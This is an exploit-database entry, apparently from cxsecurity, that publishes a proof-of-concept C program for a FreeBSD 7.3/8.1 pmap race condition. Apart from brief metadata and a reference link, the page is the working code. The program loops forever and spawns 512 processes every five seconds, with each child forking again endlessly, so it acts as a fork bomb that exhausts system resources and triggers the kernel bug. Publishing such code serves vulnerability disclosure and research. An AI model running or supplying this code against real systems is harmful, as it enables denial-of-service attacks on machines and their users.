FreeBSD 7.3/8.1 pmap race condition PoC

Published
Credit
Risk
2010.09.06
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

/*
FreeBSD 7.3/8.1 pmap race condition PoC
Credit: Maksymilian Arciemowicz
*/
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

void newproc(){
again:
fork();
sleep(3600*24);
goto again;
}

void runfork(){
pid_t adr;
if(0!=(adr=fork())) printf("fork not zero\n");
else {
printf("fork zero\n");
newproc();
}
}

int main(){

int secdel=5;
int dev;

// clock with (int)secdel secound frequency
while(1){
printf("sleep %i sec\n",secdel);
sleep(secdel);
printf("weak up\n");

// create 512 processes
dev=512;
while(dev--)
runfork();
}
return 0;
}

References:

http://cxsecurity.com/issue/WLB-2010090156


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com